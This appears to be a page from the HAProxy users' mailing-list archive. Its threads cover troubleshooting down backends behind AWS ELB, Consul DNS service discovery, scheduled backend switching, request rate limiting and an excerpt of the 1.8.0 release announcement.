On Mon, Nov 13, 2017 at 11:28 PM, James Stroehmann <
james.stroehm...@proquest.com> wrote:

> I had a similar problem, and I believe reducing my ‘hold valid’ setting to
> 1s fixed it.
>
>
>
>
>

A possible explanation is the "inter" parameter, which is by default set to
2s for the "check" operation, see
https://cbonte.github.io/haproxy-dconv/1.7/configuration.html#inter for
details.

In other words, read the docs about ALL timeouts set in Haproxy to figure
out how they correlate with each other and how to set the proper values
for your use case.
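
For illustration, the check timing can be made explicit on the server line.
A sketch combining the resolvers section from the quoted config with the
documented check defaults spelled out (the ELB hostname is shortened here,
and the inter/fall/rise values are the defaults, not a recommendation):

```
resolvers testresolver
  nameserver dns1 169.254.169.253:53
  resolve_retries 3
  timeout retry   1s
  hold valid      10s

backend test_cluster
  option httpchk /test-testalive
  # inter defaults to 2s; fall/rise default to 3/2
  server server1 my-elb.example.com:8080 check inter 2s fall 3 rise 2 resolvers testresolver
```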




> *From:* DHAVAL JAISWAL [mailto:dhava...@gmail.com]
> *Sent:* Monday, November 13, 2017 2:31 AM
> *To:* HAproxy Mailing Lists 
> *Subject:* backend has no server available!
>
>
>
> [External Email]
>
> I had the following config where we are using AWS ELB for load balancing.
> However, now we are keep getting backend test_cluster has no server
> available!
>
>
>
> Under this ELB two servers attached. Both instance are in healthy state.
> Healthy state we are checking on port 80 and tomcat response sending on
> port 8080
>
>
>
> internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.amazonaws.com
>
>
>
>
>
> resolvers testresolver
>
>   nameserver dns1 169.254.169.253:53
>
>   resolve_retries   3
>
>   timeout retry 1s
>
>   hold valid   10s
>
>
>
> backend test_cluster
>
> mode http
>
> option forwardfor
>
> fullconn 1
>
> option httpchk /test-testalive
>
> http-check expect string OK
>
> option http-server-close
>
> option abortonclose
>
> balance roundrobin
>
> server server1 internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.
> amazonaws.com:8080 check resolvers testresolver
>
>
>
>
>
> What could be the cause of this issue. How can i fix it.
>
>
>



-- 
Igor Cicimov | DevOps

p. +61 (0) 433 078 728
e. ig...@encompasscorporation.com
w. www.encompasscorporation.com
a. Level 4, 65 York Street, Sydney 2000


Re: backend has no server available!

2017-11-14 Thread Igor Cicimov
Dhaval,

What I put in my resolvers is the EC2 instance subnet DNS server, which for
EC2 is always the second IP of the subnet range, xxx.xxx.xxx.2

You can also find this IP in your /etc/resolv.conf on the haproxy
instances. Try replacing 169.254.169.253:53 with that value and see how
you go.
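
For example (the address below is an assumption; substitute whatever
/etc/resolv.conf shows on your instances):

```
# for a VPC whose range starts at 10.140.0.0, the Amazon-provided DNS
# typically sits at 10.140.0.2
resolvers testresolver
  nameserver vpcdns 10.140.0.2:53
  resolve_retries 3
  timeout retry   1s
  hold valid      10s
```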

On Wed, Nov 15, 2017 at 4:04 AM, DHAVAL JAISWAL  wrote:

> Even after reducing "hold valid"  to 1s shows the same behavior.
>
> One more observation is that after introducing ELB in haproxy config, site
> seems to have little late response.
>
> Provided link is helpful, however if any one face same issue or can share
> experience to solve it will be really helpful.
>
> On Tue, Nov 14, 2017 at 5:00 AM, Igor Cicimov  com> wrote:
>
>>
>>
>> On Mon, Nov 13, 2017 at 11:28 PM, James Stroehmann <
>> james.stroehm...@proquest.com> wrote:
>>
>>> I had a similar problem, and I believe reducing my ‘hold valid’ setting
>>> to 1s fixed it.
>>>
>>>
>>>
>>>
>>>
>>
>> Possible explanation is the "inter" parameter which is by default set to
>> 2s for the "check" operation, see
>> https://cbonte.github.io/haproxy-dconv/1.7/configuration.html#inter for details.
>>
>> In other words, read the docs about ALL timeouts set in Haproxy to figure
>> out how they correlate between each other and how to set the proper values
>> for your user case.​
>>
>>
>>
>>
>>> *From:* DHAVAL JAISWAL [mailto:dhava...@gmail.com]
>>> *Sent:* Monday, November 13, 2017 2:31 AM
>>> *To:* HAproxy Mailing Lists 
>>> *Subject:* backend has no server available!
>>>
>>>
>>>
>>> [External Email]
>>>
>>> I had the following config where we are using AWS ELB for load
>>> balancing. However, now we are keep getting backend test_cluster has no
>>> server available!
>>>
>>>
>>>
>>> Under this ELB two servers attached. Both instance are in healthy state.
>>> Healthy state we are checking on port 80 and tomcat response sending on
>>> port 8080
>>>
>>>
>>>
>>> internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.amazonaws.com
>>>
>>>
>>>
>>>
>>>
>>> resolvers testresolver
>>>
>>>   nameserver dns1 169.254.169.253:53
>>>
>>>   resolve_retries   3
>>>
>>>   timeout retry 1s
>>>
>>>   hold valid   10s
>>>
>>>
>>>
>>> backend test_cluster
>>>
>>> mode http
>>>
>>> option forwardfor
>>>
>>> fullconn 1
>>>
>>> option httpchk /test-testalive
>>>
>>> http-check expect string OK
>>>
>>> option http-server-close
>>>
>>> option abortonclose
>>>
>>> balance roundrobin
>>>
>>> server server1 internal-testtomcatautoscale-1
>>> 314784611.ap-southeast-1.elb.amazonaws.com:8080 check resolvers
>>> testresolver
>>>
>>>
>>>
>>>
>>>
>>> What could be the cause of this issue. How can i fix it.
>>>
>>>
>>>
>>


Re: backend has no server available!

2017-11-15 Thread Igor Cicimov
Dhaval,

Looking again into your config, what is this:

  option httpchk /test-testalive

supposed to be testing? It looks like instead of testing the ELB as an
endpoint you are actually testing your application, so the timeouts are
coming from your app and not the ELB. I would suggest you remove that
option and let HAP do a simple tcp check against the ELB instead of your app.
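
That is, drop the application-level check and keep only a plain TCP connect
check; a sketch of the backend from the thread with the httpchk lines
removed (hostname shortened):

```
backend test_cluster
  mode http
  option forwardfor
  balance roundrobin
  # without "option httpchk", a bare "check" performs a simple TCP connect
  # test, so a slow application cannot mark the ELB endpoint as down
  server server1 my-elb.amazonaws.com:8080 check resolvers testresolver
```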


On Wed, Nov 15, 2017 at 11:26 PM, DHAVAL JAISWAL  wrote:

> Some more information while showing backend not available.
>
> Server test_cluster/server1 is DOWN, reason: Layer7 timeout, check
> duration: 2001ms. 0 active and 0 backup servers left. 3 sessions active, 0
> requeued, 0 remaining in queue.
>  backend test_cluster has no server available!
>  Server test_cluster/server1 is DOWN, reason: Layer7 timeout, check
> duration: 2001ms. 0 active and 0 backup servers left. 1 sessions active, 0
> requeued, 0 remaining in queue.
>  backend test_cluster has no server available!
>  Server test_cluster server1 is UP, reason: Layer7 check passed, code:
> 200, info: "HTTP content check matched", check duration: 1ms. 1 active and
> 0 backup servers online. 0 sessions requeued, 0 total in queue.
>
>
>
>
> On Wed, Nov 15, 2017 at 5:20 PM, DHAVAL JAISWAL 
> wrote:
>
>> I did apply that and its under observation.
>>
>> There is one more issue after introducing Internal ELB is overall
>> performance of site is slightly reduced. The response which I used to get
>> in less than 100 ms now some time is going beyond 100 ms.
>>
>> Any clue how can I improve it.
>>
>> On Wed, Nov 15, 2017 at 4:21 AM, Igor Cicimov <
>> ig...@encompasscorporation.com> wrote:
>>
>>> Dhaval,
>>>
>>> What I put in my resolvers is the EC2 instance subnet dns server which
>>> for EC2 is always the second IP of the subnet range, xxx.xxx.xxx..2
>>>
>>> You can also find this IP in your /etc/resolv.conf on the haproxy
>>> instances. Try replacing 169.254.169.253:53 with that value and see how
>>> you go.
>>>
>>> On Wed, Nov 15, 2017 at 4:04 AM, DHAVAL JAISWAL 
>>> wrote:
>>>
>>>> Even after reducing "hold valid"  to 1s shows the same behavior.
>>>>
>>>> One more observation is that after introducing ELB in haproxy config,
>>>> site seems to have little late response.
>>>>
>>>> Provided link is helpful, however if any one face same issue or can
>>>> share experience to solve it will be really helpful.
>>>>
>>>> On Tue, Nov 14, 2017 at 5:00 AM, Igor Cicimov <
>>>> ig...@encompasscorporation.com> wrote:
>>>>
>>>>>
>>>>>
>>>>> On Mon, Nov 13, 2017 at 11:28 PM, James Stroehmann <
>>>>> james.stroehm...@proquest.com> wrote:
>>>>>
>>>>>> I had a similar problem, and I believe reducing my ‘hold valid’
>>>>>> setting to 1s fixed it.
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>> ​Possible explanation is the "inter" parameter which is by default set
>>>>> to 2s for the "check" operation, see
>>>>> https://cbonte.github.io/haproxy-dconv/1.7/configuration.html#inter for details.
>>>>>
>>>>> In other words, read the docs about ALL timeouts set in Haproxy to
>>>>> figure out how they correlate between each other and how to set the proper
>>>>> values for your user case.​
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>> *From:* DHAVAL JAISWAL [mailto:dhava...@gmail.com]
>>>>>> *Sent:* Monday, November 13, 2017 2:31 AM
>>>>>> *To:* HAproxy Mailing Lists 
>>>>>> *Subject:* backend has no server available!
>>>>>>
>>>>>>
>>>>>>
>>>>>> [External Email]
>>>>>>
>>>>>> I had the following config where we are using AWS ELB for load
>>>>>> balancing. However, now we are keep getting backend test_cluster has no
>>>>>> server available!
>>>>>>
>>>>>>
>>>>>>
>>>>>> Under this ELB two servers attached. Both instance are in healthy
>>>>>> state. Healthy state we are checking on port 80 and tomcat response 
>>>>>> sending
>>>>>> on port 8080
>>>>>>
>>>>>>
>>>>>>
>>>>>> internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.a
>>>>>> mazonaws.com
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> resolvers testresolver
>>>>>>
>>>>>>   nameserver dns1 169.254.169.253:53
>>>>>>
>>>>>>   resolve_retries   3
>>>>>>
>>>>>>   timeout retry 1s
>>>>>>
>>>>>>   hold valid   10s
>>>>>>
>>>>>>
>>>>>>
>>>>>> backend test_cluster
>>>>>>
>>>>>> mode http
>>>>>>
>>>>>> option forwardfor
>>>>>>
>>>>>> fullconn 1
>>>>>>
>>>>>> option httpchk /test-testalive
>>>>>>
>>>>>> http-check expect string OK
>>>>>>
>>>>>> option http-server-close
>>>>>>
>>>>>> option abortonclose
>>>>>>
>>>>>> balance roundrobin
>>>>>>
>>>>>> server server1 internal-testtomcatautoscale-1
>>>>>> 314784611.ap-southeast-1.elb.amazonaws.com:8080 check resolvers
>>>>>> testresolver
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> What could be the cause of this issue. How can i fix it.
>>>>>>
>>>>>>
>>>>>>
>>>>>


Re: Change backend between a time frame

2017-11-17 Thread Igor Cicimov
On Sat, Nov 18, 2017 at 2:35 AM, GARET Julien 
wrote:

> Hello,
>
>
>
> I have a use case here where we want to be able to modify the backend
> between 8 pm et and 8 am, everyday. I was guessing that it would have
> something to do with an acl and the Date header. Do you think it would be
> possible ?
>
>
>
> We are using Haproxy 1.5.14 on CentOS 7.
>

Upgrade to 1.6 and use:
https://cbonte.github.io/haproxy-dconv/1.6/management.html#9.2-set%20server

to update the backend with a simple cronjob via the stats socket.
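
For example, a script run from cron at 8 pm and 8 am could push the state
change through the stats socket. The backend/server names and the socket
path below are made-up placeholders:

```shell
BACKEND=bk_app
SERVER=night_srv
STATE="${1:-ready}"   # e.g. pass "maint" at 8 pm and "ready" at 8 am
CMD="set server $BACKEND/$SERVER state $STATE"
echo "$CMD"
# in the real cronjob the command is piped to the socket instead of printed:
# echo "$CMD" | socat stdio /var/run/haproxy.sock
```

Two crontab entries, one per transition, are then enough to flip the
backend every day.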


Re: [ANNOUNCE] haproxy-1.8.0

2017-11-26 Thread Igor Cicimov
w
application servers occasionally returning a small object (favicon.ico,
main.css etc). While the obvious response is that installing a cache
there is the best idea, it is sometimes perceived as overkill for just
a few files. So what we've done here was to fill exactly that hole :
have a *safe*, maintenance-free, small objects cache. In practice, if
there is any doubt about a response's cachability, it will not cache.
Same if the response contains a Vary header or is larger than a buffer.
However this can bring huge benefits for situations where there's no
argument against trivial caching. The intent is to keep it as simple and
fast as possible so that it can always be faster than retrieving the
same
object from the next layer (possibly a full-featured cache). Note that I
purposely asked William *not* to implement the purge on the CLI so that
it remains maintenance-free and we don't see it abused where it should
not be installed.

This version brings a total of 1208 commits authored by 54 persons. That's
almost double the number of commits of 1.7 (706) from slightly fewer
people (62 by then), though most of them are the same.

A few known limitations still apply to this release, but they are minor
enough to allow us to release and fix them later :
  - master-worker + daemon (-W -D) fails strangely on FreeBSD, and the
workaround is even stranger. Since the master-worker was meant to
replace
systemd-wrapper, it's not needed on this platform so we'll take care of
analysing the issue in depth. In the mean time, don't use -W on FreeBSD
(nor on OpenBSD given that the issue involved the kqueue poller).

  - the CLI's "show sess" command is known for not being 100% thread-safe,
so it's better to avoid using it if more than one thread is enabled.
Note
that it will not corrupt your system, it will most often work, but may
either report occasional garbage or immediately crash. If it completes
the dump you're safe. We'll work on it as well.

  - both the cache and HTTP compression use filters. It is not trivial to
safely use them both, we still need to sort this out and either
automatically deal with each corner case or document recommendations for
safe use. For now, please do not enable compression with the cache
(choose
only one of them). Note that neither is enabled by default so if you
don't
know, you're safe.

  - device detection engines currently don't support multi-threading (but
it's
safe to build with it, there is a runtime check).

The outstanding amount of new features above proves that the new development
model we've adopted last year works much better than what we had in the
past.
However I also noticed that it added a lot more pressure on a few person's
shoulders whose help has been invaluable in screening each and every report
so that the developers could stay focused on their tasks. And for this
reason,
among the 466 persons who participated to discussions over the last year and
those animating the Discourse forums, I'd like to address special thanks to
the following ones who together responded to the vast majority of the
threads
on the list, saving many of us from having to leave our code :
  - Aleksandar Lazic (aka Aleks)
  - Cyril Bonté
  - Daniel Schneller
  - Emmanuel Hocdet (aka Manu)
  - Igor Cicimov
  - Jarno Huuskonen
  - Pavlos Parissis
  - Thierry Fournier
  - Vincent Bernat

and a very special one for Lukas Tribus who in addition to providing a lot
of high quality answers on the mailing list has been tirelessly responding
to almost every question on Discourse, which is truly amazing (I'm starting
to suspect that there are several persons using the same name)! I'm totally
aware that saying "thank you" is not enough and that we'll definitely have
to see how to make your life easier as well guys, so that we can continue
to scale without adding you more burden!

I also noticed that the average quality of problem reports has significantly
increased over time, in part thanks to some long-time participants well used
to the process like Conrad Hoffmann, Pieter Baauw (aka PiBa-NL), Patrick
Hemmer, Dmitry Sivachenko or Jarno Huuskonen, and it's really great because
there's nothing more annoying than having to respond to a problem by always
starting to ask for the same information. So please keep up the good work
guys!

In my opinion we haven't emitted enough versions to make it easy for more
people to test, just like we haven't emitted enough stable releases, due to
all the people involved in the process being busy on their development. This
is something we'll have to address. I'll send a proposal of release schedule
for 1.9 some time later.

Now 1.9 opens with 1.9-dev0 so that we can go break things as usual :-)

Ple

Re: redirect question

2018-12-13 Thread Igor Cicimov
On Thu, Dec 13, 2018 at 10:18 PM Sevan Gelici  wrote:

> Hello,
>
> Could someone help me with a problem? I want to use haproxy but cannot get
> one part working. All traffic needs to pass through the proxy, but one
> folder needs to be IP-masked only.
>
> I try to explain by examples
>
> So lets say
> proxy http://111.111.111.111:8000 everything what requests here  goes to
> orginal host. That i have but i want to exclude one location somehow but
> still i want it masked.
>
> http://111.111.111.111:8000/test/
>
> My configuration works fine but only this /test part is not going well.
>
>  global
> log /dev/log   local0
> chroot /var/lib/haproxy
> stats socket /run/haproxy/admin.sock mode 777 level admin
> stats timeout 30s
> user haproxy
> group haproxy
> daemon
>maxconn 1
>
> defaults
> log global
> mode http
> maxconn 1
> option httplog
> option logasap
> option forwardfor
> stats enable
> stats uri /haproxy?stats
> #Set the maximum allowed time to wait for a complete HTTP request
> timeout http-request 5s
> #Set the maximum time to wait for a connection attempt to a server
> to succeed.
> timeout connect 5s
> #Set the maximum inactivity time on the client side.
> timeout client 5s
> #Set the maximum inactivity time on the server side.
> timeout server 10s
>
> frontend http
> bind *:8080
>
> default_backend main
>  option forwardfor header X-Forwarded-For
> capture request header Host   len 32
> capture request header Referrer len 64
> capture request header User-Agent len 64
>
>
> backend main
>server main  111.111.111.111:8080  check
>option http-buffer-request
> option forwardfor
>http-request set-header X-Forwarded-Port %[dst_port]
>


>http-request redirect location http://%[hdr(host)]/test/ code 301
> if { path /test }
>
>
This does not make much sense since you are creating an infinite redirection
loop; /test/ and /test are virtually the same path. What exactly did you
want to achieve with this? I'm not sure I understand what "masking" means.

>
> I think this part is not correct: http-request redirect location 
> http://%[hdr(host)]/test/
> code 301 if { path /test }
>
>
> I used also an another application called trafficserver but i want to use
> haproxy. In there documentation its this
>
>
> https://docs.trafficserver.apache.org/en/8.0.x/admin-guide/files/records.config.en.html
>
>
> number_of_redirections=0 | This setting determines the maximum number of
> times Trafficserver does a redirect follow location on receiving a 3XX
> Redirect response for a given client request.
>
> What can i do to get this option working on haproxy.
>
> Kind regards,
>
> Sevan Gelici
>
>


Using server-template for DNS resolution

2019-02-07 Thread Igor Cicimov
Hi,

I have a Jetty frontend exposed for a couple of ActiveMQ servers behind an
SSL-terminating Haproxy-1.8.18. They share the same storage and state via a
lock file and there is only one active AMQ at any given time. I'm testing
this now with a dynamic backend using Consul DNS resolution:

# dig +short @127.0.0.1 -p 8600 activemq.service.consul
10.140.4.122
10.140.3.171

# dig +short @127.0.0.1 -p 8600 _activemq._tcp.service.consul SRV
1 1 61616 ip-10-140-4-122.node.dc1.consul.
1 1 61616 ip-10-140-3-171.node.dc1.consul.

The backends status, the current "master":

root@ip-10-140-3-171:~/configuration-management# netstat -tuplen | grep java
tcp        0      0 0.0.0.0:8161    0.0.0.0:*    LISTEN   503   13749196   17256/java
tcp        0      0 0.0.0.0:61616   0.0.0.0:*    LISTEN   503   13749193   17256/java

and the "slave":

root@ip-10-140-4-122:~# netstat -tuplen | grep java

So the service ports are not available on the second one.

This is the relevant part of the HAP config that I think might be of
interest:

global
server-state-base /var/lib/haproxy
server-state-file hap_state

defaults
load-server-state-from-file global
default-server init-addrlast,libc,none

listen amq
bind ... ssl crt ...
mode http

option prefer-last-server

# when this is on the backend is down
#option tcp-check

default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s
maxconn 25 maxqueue 256 weight 100

# working but both show as up
server-template amqs 2 activemq.service.consul:8161 check

# working old static setup
#server ip-10-140-3-171 10.140.3.171:8161 check
#server ip-10-140-4-122 10.140.4.122:8161 check

This is working but the thing is I see both servers as UP in the HAP
console:
[image: amqs.png]
Is this normal for this kind of setup or I'm doing something wrong?

Another observation, when I have tcp check enabled like:

option tcp-check

the way I had it with the static lines like:

server ip-10-140-3-171 10.140.3.171:8161 check
server ip-10-140-4-122 10.140.4.122:8161 check

then both servers show as down.
Thanks in advance for any kind of input.
Igor
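
(For completeness, a sketch of the resolvers section that goes with this
setup, wired to the local Consul agent from the dig commands above; the
timeout/hold values are assumptions:)

```
resolvers consul
  nameserver consul 127.0.0.1:8600
  accepted_payload_size 8192
  resolve_retries 3
  timeout retry 1s
  hold valid    5s

listen amq
  # ... bind/mode/default-server lines as in the config above ...
  # with SRV records the port comes from DNS, so no :8161 is needed:
  server-template amqs 2 _activemq._tcp.service.consul resolvers consul check
```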


Re: Using server-template for DNS resolution

2019-02-07 Thread Igor Cicimov
On Fri, Feb 8, 2019 at 2:29 PM Igor Cicimov 
wrote:

> Hi,
>
> I have a Jetty frontend exposed for couple of ActiveMQ servers behind SSL
> terminating Haproxy-1.8.18. They share same storage and state via lock file
> and there is only one active AMQ at any given time. I'm testing this now
> with dynamic backend using Consul DNS resolution:
>
> # dig +short @127.0.0.1 -p 8600 activemq.service.consul
> 10.140.4.122
> 10.140.3.171
>
> # dig +short @127.0.0.1 -p 8600 _activemq._tcp.service.consul SRV
> 1 1 61616 ip-10-140-4-122.node.dc1.consul.
> 1 1 61616 ip-10-140-3-171.node.dc1.consul.
>
> The backends status, the current "master":
>
> root@ip-10-140-3-171:~/configuration-management# netstat -tuplen | grep
> java
> tcp    0    0 0.0.0.0:8161    0.0.0.0:*    LISTEN    503    13749196    17256/java
> tcp    0    0 0.0.0.0:61616   0.0.0.0:*    LISTEN    503    13749193    17256/java
>
> and the "slave":
>
> root@ip-10-140-4-122:~# netstat -tuplen | grep java
>
> So the service ports are not available on the second one.
>
> This is the relevant part of the HAP config that I think might be of
> interest:
>
> global
> server-state-base /var/lib/haproxy
> server-state-file hap_state
>
> defaults
> load-server-state-from-file global
> default-server init-addr last,libc,none
>
> listen amq
> bind ... ssl crt ...
> mode http
>
> option prefer-last-server
>
> # when this is on the backend is down
> #option tcp-check
>
> default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s
> maxconn 25 maxqueue 256 weight 100
>
> # working but both show as up
> server-template amqs 2 activemq.service.consul:8161 check
>
> # working old static setup
> #server ip-10-140-3-171 10.140.3.171:8161 check
> #server ip-10-140-4-122 10.140.4.122:8161 check
>
> This is working but the thing is I see both servers as UP in the HAP
> console:
> [image: amqs.png]
> Is this normal for this kind of setup or I'm doing something wrong?
>
> Another observation, when I have tcp check enabled like:
>
> option tcp-check
>
> the way I had it with the static lines like:
>
> server ip-10-140-3-171 10.140.3.171:8161 check
> server ip-10-140-4-122 10.140.4.122:8161 check
>
> then both servers show as down.
> Thanks in advance for any kind of input.
> Igor
>
> Ok, the state has changed now, I have correct state on one haproxy:

[image: amqs_hap1.png]
but on the second the whole backend is down:

[image: amqs_hap2.png]
I confirmed via telnet that I can connect to port 8161 to the running amq
server from both haproxy servers.


Re: Using server-template for DNS resolution

2019-02-08 Thread Igor Cicimov
Hi Baptiste,

On Fri, Feb 8, 2019 at 6:10 PM Baptiste  wrote:

>
>
> On Fri, Feb 8, 2019 at 6:09 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> On Fri, Feb 8, 2019 at 2:29 PM Igor Cicimov <
>> ig...@encompasscorporation.com> wrote:
>>
>>> Hi,
>>>
>>> I have a Jetty frontend exposed for couple of ActiveMQ servers behind
>>> SSL terminating Haproxy-1.8.18. They share same storage and state via lock
>>> file and there is only one active AMQ at any given time. I'm testing this
>>> now with dynamic backend using Consul DNS resolution:
>>>
>>> # dig +short @127.0.0.1 -p 8600 activemq.service.consul
>>> 10.140.4.122
>>> 10.140.3.171
>>>
>>> # dig +short @127.0.0.1 -p 8600 _activemq._tcp.service.consul SRV
>>> 1 1 61616 ip-10-140-4-122.node.dc1.consul.
>>> 1 1 61616 ip-10-140-3-171.node.dc1.consul.
>>>
>>> The backends status, the current "master":
>>>
>>> root@ip-10-140-3-171:~/configuration-management# netstat -tuplen | grep
>>> java
>>> tcp    0    0 0.0.0.0:8161    0.0.0.0:*    LISTEN    503    13749196    17256/java
>>> tcp    0    0 0.0.0.0:61616   0.0.0.0:*    LISTEN    503    13749193    17256/java
>>>
>>> and the "slave":
>>>
>>> root@ip-10-140-4-122:~# netstat -tuplen | grep java
>>>
>>> So the service ports are not available on the second one.
>>>
>>> This is the relevant part of the HAP config that I think might be of
>>> interest:
>>>
>>> global
>>> server-state-base /var/lib/haproxy
>>> server-state-file hap_state
>>>
>>> defaults
>>> load-server-state-from-file global
>>> default-server init-addr last,libc,none
>>>
>>> listen amq
>>> bind ... ssl crt ...
>>> mode http
>>>
>>> option prefer-last-server
>>>
>>> # when this is on the backend is down
>>> #option tcp-check
>>>
>>> default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s
>>> maxconn 25 maxqueue 256 weight 100
>>>
>>> # working but both show as up
>>> server-template amqs 2 activemq.service.consul:8161 check
>>>
>>> # working old static setup
>>> #server ip-10-140-3-171 10.140.3.171:8161 check
>>> #server ip-10-140-4-122 10.140.4.122:8161 check
>>>
>>> This is working but the thing is I see both servers as UP in the HAP
>>> console:
>>> [image: amqs.png]
>>> Is this normal for this kind of setup or I'm doing something wrong?
>>>
>>> Another observation, when I have tcp check enabled like:
>>>
>>> option tcp-check
>>>
>>> the way I had it with the static lines like:
>>>
>>> server ip-10-140-3-171 10.140.3.171:8161 check
>>> server ip-10-140-4-122 10.140.4.122:8161 check
>>>
>>> then both servers show as down.
>>> Thanks in advance for any kind of input.
>>> Igor
>>>
>>> Ok, the state has changed now, I have correct state on one haproxy:
>>
>> [image: amqs_hap1.png]
>> but on the second the whole backend is down:
>>
>> [image: amqs_hap2.png]
>> I confirmed via telnet that I can connect to port 8161 to the running amq
>> server from both haproxy servers.
>>
>>
>
>
> Hi Igor,
>
> You're using the libc resolver function at startup time to resolve your
> backend, this is not recommended integration with Consul.
>  You will find some good explanations in this blog article:
>
> https://www.haproxy.com/fr/blog/haproxy-and-consul-with-dns-for-service-discovery/
>
> Basically, you should first create a "resolvers" section, in order to
> allow HAProxy to perform DNS resolution at runtime too.
>
> resolvers consul
>   nameserver consul 127.0.0.1:8600
>   accepted_payload_size 8192
>
> Then, you need to adjust your server-template line, like this:
> server-template amqs 10 _activemq._tcp.service.consul resolvers consul
> resolve-prefer ipv4 check
>
> In the example above, I am using on purpose the SRV records, because
> HAProxy supports it and it will use all information available in the
> response to update server's IP, weight and port.
>
> I hope this will help you.
>
> Baptiste
>

All sorted now. For the record and those interested here is my setup:

Haproxy:
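(The archive truncates the config that followed. A minimal sketch consistent
with Baptiste's advice above — the server count and SRV name are illustrative,
not necessarily Igor's final setup:)

```
# Illustrative sketch: runtime DNS resolution against the local Consul agent
resolvers consul
    nameserver consul 127.0.0.1:8600
    accepted_payload_size 8192

listen amq
    bind ... ssl crt ...
    mode http
    # SRV records carry IP, port and weight, so HAProxy can fill
    # all server slots at runtime and track changes in Consul
    server-template amqs 10 _activemq._tcp.service.consul resolvers consul resolve-prefer ipv4 check
```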

Re: Anyone heard about DPDK?

2019-02-10 Thread Igor Cicimov
On Mon, 11 Feb 2019 1:49 am Bruno Henc wrote:

> Hi,
>
>
> Another good explanation on what DPDK does is available here:
>
>
> https://learning.oreilly.com/videos/oscon-2017/9781491976227/9781491976227-video306685
>
> https://wiki.fd.io/images/1/1d/40_Gbps_IPsec_on_commodity_hardware.pdf
>
>
>
> On 2/10/19 12:21 PM, Aleksandar Lazic wrote:
> > Am 10.02.2019 um 12:06 schrieb Lukas Tribus:
> >> On Sun, 10 Feb 2019 at 10:48, Aleksandar Lazic 
> wrote:
> >>> Hi.
> >>>
> >>> I have seen this in some twitter posts and asked me if it's something
> useable for a Loadbalancer like HAProxy ?
> >>>
> >>> https://www.dpdk.org/
> >>>
> >>> To be honest it looks like a virtual NIC, but I'm not sure.
> >> See:
> >> https://www.mail-archive.com/haproxy@formilux.org/msg26748.html
> > 8-O Sorry I have forgotten that Question.
> > Sorry the noise and thanks for your patience.
> >
> >> lukas
> > Greetings
> > Aleks
> >
>

According to this:

DPDK allows the host to process packets faster by bypassing the Linux
kernel. Instead, interactions with the NIC are performed using drivers and
the DPDK libraries.

It might help network performance. Source
https://docs.paloaltonetworks.com/vm-series/8-0/vm-series-deployment/set-up-the-vm-series-firewall-on-kvm/performance-tuning-of-the-vm-series-for-kvm/integrate-open-vswitch-with-dpdk.html

It is discussed in the context of KVM and OvS, so I'm not sure if it is useful
in other cases.

>


Re: Tune HAProxy in front of a large k8s cluster

2019-02-19 Thread Igor Cicimov
On Wed, 20 Feb 2019 3:39 am Joao Morais wrote:

> Hi Willy,
>
> > Em 19 de fev de 2019, à(s) 01:55, Willy Tarreau  escreveu:
> >
> > use_backend foo if { var(req.host) ssl:www.example.com }
> >
> This is a nice trick that I’m planning to use with dynamic use_backend. I
> need to concat host (sometimes ssl_fc_sni) and path. The question is: how
> do I concatenate two strings?


Something like this:

> http-request set-header X-Concat %[req.fhdr(Authorization),word(3,.)]_%[src]



> Apparently there isn’t a concat converter and http-request set-var()
> doesn’t support custom-log like expressions. There is a usecase where I
> need to concatenate ssl_fc_sni and path before search in the map.
>
>
> > At this point I think that such heavy configs reach their limits and
> > that the only right solution is the dynamic use_backend (possibly with
> > a map).
> >
> Thanks for the detailed review! I’m going to the map route.
>
>
> >> There are also a lot of other backends and
> >> servers with health check enabled every 2s consuming some cpu and
> network.
> >
> > For this if you have many times the same server you can use the "track"
> > directive, and only enable checks on a subset of servers and have all
> > other track them. Typically you'd have a dummy backend dedicated to
> > checks, and checks disabled in all other backends, replaced with track.
> >
> I’d say that currently about 98% are unique servers, but this is indeed a
> nice implementation to the configuration builder.
>
>
> >> Note also that I needed to add -no-pie otherwise gprof output was empty
> --
> >> sounds a gcc issue. Let me know if this is good enough.
> >
> > Yes that's fine and the output was perfectly exploitable.
> >
> Great!
>
> One final note - sorry about the flood yesterday. I can say with about 90%
> sure I sent only one message =)
>
> ~jm
>
>
>
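On the concat question, two hedged pointers for archive readers (not verified
on every version this thread targets): the `base` sample fetch already yields
the Host header concatenated with the path, and newer releases (2.0+) have a
`concat()` converter that works on variables. A sketch, with the map path
illustrative:

```
# base = Host header + path, directly usable as a map key:
use_backend %[base,map_beg(/etc/haproxy/hosts.map,default)]

# To build sni + path explicitly via variables (needs the concat converter):
http-request set-var(req.path) path
http-request set-var(req.key) ssl_fc_sni,concat(,req.path,)
use_backend %[var(req.key),map_beg(/etc/haproxy/hosts.map,default)]
```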


Re: How to allow Client Requests at a given rate

2019-02-23 Thread Igor Cicimov
On Sat, 23 Feb 2019 3:09 pm Santos Das  wrote:

> Hi,
>
> I have a requirement where I need to allow only certain request rate for a
> given URL.
>
> Say /login can be accessed at the rate of 10 RPS. If I get 100 RPS, then
> 10 should be allowed and 90 should be denied.
>
> Any help on how this can be achieved ?
>
> *I tried to use the sticky table, but once it blocks it blocks for ever.
> Please advise.*
>
>
> frontend api_gateway
> bind 0.0.0.0:80 
> mode http
> option forwardfor
>
> default_backend nodes
>
>  # Set up stick table to track request rates
> stick-table type binary len 8 size 1m expire 10s store
> http_req_rate(10s)
>
> # Track client by base32+src (Host header + URL path + src IP)
> http-request track-sc0 base32+src
>
> # Check map file to get rate limit for path
> http-request set-var(req.rate_limit)
> path,map_beg(/etc/hapee-1.8/maps/rates.map)
>
> # Client's request rate is tracked
> http-request set-var(req.request_rate)
> base32+src,table_http_req_rate(api_gateway)
>
> # Subtract the current request rate from the limit
> # If less than zero, set rate_abuse to true
> acl rate_abuse var(req.rate_limit),sub(req.request_rate) lt 0
>

Shouldn't this be:
acl rate_abuse var(req.rate_limit),sub(var(req.request_rate)) lt 0


> # Deny if rate abuse
